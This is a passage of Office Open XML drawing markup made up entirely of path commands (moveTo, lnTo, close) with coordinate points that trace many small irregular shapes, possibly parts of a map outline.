                  <a:pt x="18252" y="9218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18257" y="9125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18222" y="9138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18222" y="9218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18205" y="9260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18196" y="9302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18238" y="9395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18257" y="9353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18269" y="9260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18290" y="9218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18290" y="9087"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7110" y="9138"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7074" y="9157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7074" y="9209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058" y="9250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7069" y="9260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7121" y="9241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7126" y="9138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7110" y="9138"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="15647" y="9279"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15621" y="9507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15635" y="9703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15666" y="9805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15718" y="9773"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15744" y="9732"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15750" y="9600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15718" y="9456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15687" y="9353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15647" y="9279"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18382" y="9292"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18387" y="9395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18346" y="9404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18335" y="9456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18294" y="9497"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18269" y="9433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18238" y="9484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18201" y="9526"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18180" y="9639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18196" y="9680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18238" y="9600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18264" y="9610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18283" y="9558"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18320" y="9619"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18304" y="9680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18325" y="9783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18398" y="9857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18413" y="9793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18393" y="9690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18419" y="9629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18445" y="9764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18460" y="9639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18455" y="9568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18445" y="9475"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18439" y="9424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18434" y="9353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18382" y="9292"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17869" y="9680"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17843" y="9783"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17797" y="9876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17750" y="9947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17724" y="9998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17698" y="10091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17656" y="10194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17584" y="10226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17558" y="10255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17548" y="10370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17501" y="10389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17454" y="10348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17418" y="10441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17413" y="10563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17423" y="10678"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17449" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17480" y="10842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17486" y="11015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17538" y="11037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17579" y="11025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17600" y="11098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17673" y="11047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17703" y="11089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17745" y="11098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17765" y="11179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17838" y="11118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17843" y="11169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17875" y="10954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17875" y="10819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17937" y="10729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17932" y="10604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17953" y="10511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18024" y="10492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17953" y="10370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17962" y="10306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17916" y="10174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17946" y="10062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17993" y="10011"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17979" y="9947"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18019" y="9937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18024" y="9886"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17972" y="9844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17932" y="9805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17927" y="9741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17894" y="9680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17869" y="9680"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="16573" y="9876"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16584" y="9937"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16646" y="10091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16698" y="10174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16728" y="10287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16787" y="10370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16806" y="10482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16827" y="10595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16879" y="10707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16926" y="10903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16952" y="11005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16999" y="11108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17020" y="11191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17098" y="11304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17143" y="11416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17211" y="11416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17221" y="11201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17237" y="11037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17211" y="10954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17164" y="10935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17143" y="10861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17133" y="10768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17112" y="10758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17081" y="10717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17102" y="10604"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17056" y="10543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17020" y="10431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16968" y="10338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16910" y="10338"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16848" y="10184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16813" y="10133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16766" y="10040"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16709" y="9908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16615" y="9876"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16573" y="9876"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18563" y="10328"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18542" y="10370"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18533" y="10482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18554" y="10656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18575" y="10739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18594" y="10729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18568" y="10656"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18580" y="10575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18610" y="10585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18610" y="10460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18605" y="10409"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18568" y="10399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18563" y="10328"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18393" y="10399"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18330" y="10492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18264" y="10502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18186" y="10482"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18139" y="10441"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18087" y="10543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18076" y="10595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18045" y="10800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18035" y="10912"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18009" y="11005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18024" y="11098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18050" y="11098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18056" y="11230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18035" y="11355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18061" y="11397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18097" y="11374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18102" y="11179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18097" y="11015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18139" y="10973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18134" y="11108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18175" y="11191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18165" y="11243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18180" y="11281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18243" y="11230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18212" y="11333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18231" y="11384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18264" y="11345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18269" y="11252"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18217" y="11098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18231" y="11057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18175" y="10883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18226" y="10819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18257" y="10749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18283" y="10768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18290" y="10707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18175" y="10749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18139" y="10810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18087" y="10688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18097" y="10585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18149" y="10563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18248" y="10563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18309" y="10585"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18356" y="10563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18403" y="10431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18393" y="10399"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18839" y="10665"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18808" y="10717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18724" y="10749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18750" y="10810"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18801" y="10842"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18822" y="10922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18916" y="10922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18916" y="10954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18874" y="10954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18808" y="11005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18853" y="11066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18853" y="11127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18865" y="11179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18890" y="11169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18912" y="11098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18994" y="11230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19046" y="11243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19159" y="11355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19185" y="11467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19197" y="11612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19154" y="11653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19124" y="11766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19201" y="11766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19216" y="11724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19279" y="11743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19331" y="11859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19393" y="11868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19423" y="11888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19470" y="11846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19470" y="11743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19508" y="11692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19564" y="11663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19637" y="11714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19663" y="11836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19694" y="11910"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19734" y="12000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19797" y="12022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19849" y="12032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19859" y="12074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19901" y="12064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19911" y="12022"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19849" y="11961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19870" y="11939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19823" y="11920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19828" y="11859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19793" y="11859"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19760" y="11714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19708" y="11621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19704" y="11538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19755" y="11519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19746" y="11448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19647" y="11365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19642" y="11281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19611" y="11211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19569" y="11150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19461" y="11066"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19357" y="10973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19289" y="10944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19248" y="10903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19197" y="10851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19145" y="10851"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19072" y="10935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19020" y="11076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18957" y="10996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18942" y="10781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18931" y="10729"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18839" y="10665"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="19958" y="10964"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19942" y="10996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19984" y="11037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20019" y="11089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20045" y="11140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20057" y="11191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20066" y="11272"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20087" y="11230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20082" y="11159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20061" y="11118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20036" y="11057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20010" y="11025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19993" y="10996"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19958" y="10964"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18575" y="11005"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18558" y="11076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18601" y="11089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18636" y="11076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18688" y="11089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18735" y="11150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18714" y="11037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18652" y="11005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18575" y="11005"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18507" y="11047"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18445" y="11057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18455" y="11108"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18497" y="11140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18523" y="11089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18507" y="11047"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20026" y="11179"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19989" y="11191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19993" y="11262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19958" y="11313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19942" y="11365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19906" y="11374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19901" y="11304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19890" y="11304"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19880" y="11365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19849" y="11374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19793" y="11355"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19786" y="11406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19823" y="11435"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19870" y="11477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19901" y="11477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19932" y="11448"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19967" y="11416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19979" y="11374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20010" y="11365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20036" y="11281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20040" y="11211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20026" y="11179"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20175" y="11304"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20165" y="11323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20175" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20201" y="11509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20222" y="11560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20243" y="11551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20248" y="11509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20222" y="11467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20196" y="11374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20181" y="11345"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20175" y="11304"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="18952" y="11365"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18937" y="11406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18926" y="11458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18926" y="11560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18963" y="11467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18963" y="11397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18952" y="11365"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17227" y="11426"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17180" y="11551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17237" y="11560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17247" y="11621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17357" y="11673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17383" y="11663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17423" y="11673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17491" y="11724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17548" y="11743"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17609" y="11756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17668" y="11756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17729" y="11807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17802" y="11756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17729" y="11682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17642" y="11653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17621" y="11560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17512" y="11499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17496" y="11560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17376" y="11538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17371" y="11499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17345" y="11487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17298" y="11426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17227" y="11426"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20285" y="11519"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20278" y="11538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20299" y="11602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20325" y="11631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20337" y="11621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20316" y="11570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20285" y="11519"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="20389" y="11612"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20377" y="11631"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20398" y="11673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20429" y="11724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20476" y="11785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20471" y="11756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20460" y="11714"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20414" y="11653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20389" y="11612"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="17937" y="11724"/>
                </a:moveTo>
                <a:lnTo>
